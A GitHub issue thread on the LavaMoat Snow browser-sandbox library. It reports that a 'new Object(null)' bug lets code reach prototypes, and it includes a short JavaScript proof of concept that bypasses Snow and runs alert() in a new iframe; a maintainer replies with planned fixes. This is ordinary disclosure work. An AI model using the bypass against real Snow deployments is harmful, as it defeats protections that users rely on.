### ISSUE TITLE
Snow can by bypassed with Prototype Pollution

### ISSUE THREAD

**Issue by terjanq** [LavaMoat/snow#146]
It seems that `const target = new Object(null);`  in https://github.com/LavaMoat/snow/blob/1c8faa81291e6f6dffe62b7106eff2492213375d/src/proxy.js#L17 was supposed to be `Object.create(null)`. Because of that bug, it's possible to get to all the prototypes.

```js
var proxy = open('#asd', '_top');
proxy.constructor.getPrototypeOf.call = () => null;
var iframe = document.createElement('iframe');
document.body.appendChild(iframe);
iframe.contentWindow.alert(1337);
```

**Comment by naugtur** [comment]
Thanks for contributing. The main maintainer of this project is temporary unavailable, but we'll definitely get back to this.
The plan is to tighten some limitations on DOM usage that Snow already introduces and fixing the missing overrides where possible. Some of the work has started (see PR tab)

Meanwhile we're also working with W3C to propose a basic building block of Snow getting introduced into the browser so that all of the monkey-patching can be eliminated in the future. https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html

Feel free to update this issue with comments on how you think it should be addressed. We may reach out with questions later.
